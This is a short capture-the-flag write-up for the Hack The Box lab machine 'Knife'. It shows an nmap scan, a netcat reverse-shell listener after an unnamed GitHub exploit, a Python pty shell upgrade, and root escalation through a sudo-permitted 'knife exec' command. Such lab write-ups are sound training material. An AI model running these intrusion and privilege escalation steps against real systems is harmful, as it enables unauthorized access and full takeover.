neoh main ~/HTB/knife sudo nmap -sSCV -p- -T4 10.10.10.242 -oN nmap.md
[sudo] password for neoh:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 21:10 EST
Nmap scan report for 10.10.10.242
Host is up (0.025s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.82 secondsNmap reveals ssh on port 22 and a website on port 80.
I found a nice exploit on GitHub that will provide a reverse shell. Let’s start a listener.
neoh main ~ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.242 52250
bash: cannot set terminal process group (969): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/$ export TERM=xterm
export TERM=xterm
[email protected]:/$Time for escalation. Enumeration didn’t take long 😉
[email protected]:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knifeThis should be fairly easy!
[email protected]:/$ sudo knife exec -E 'exec "/bin/sh"'
sudo knife exec -E 'exec "/bin/sh"'
# whoami
whoami
rootDone!!! Rooted!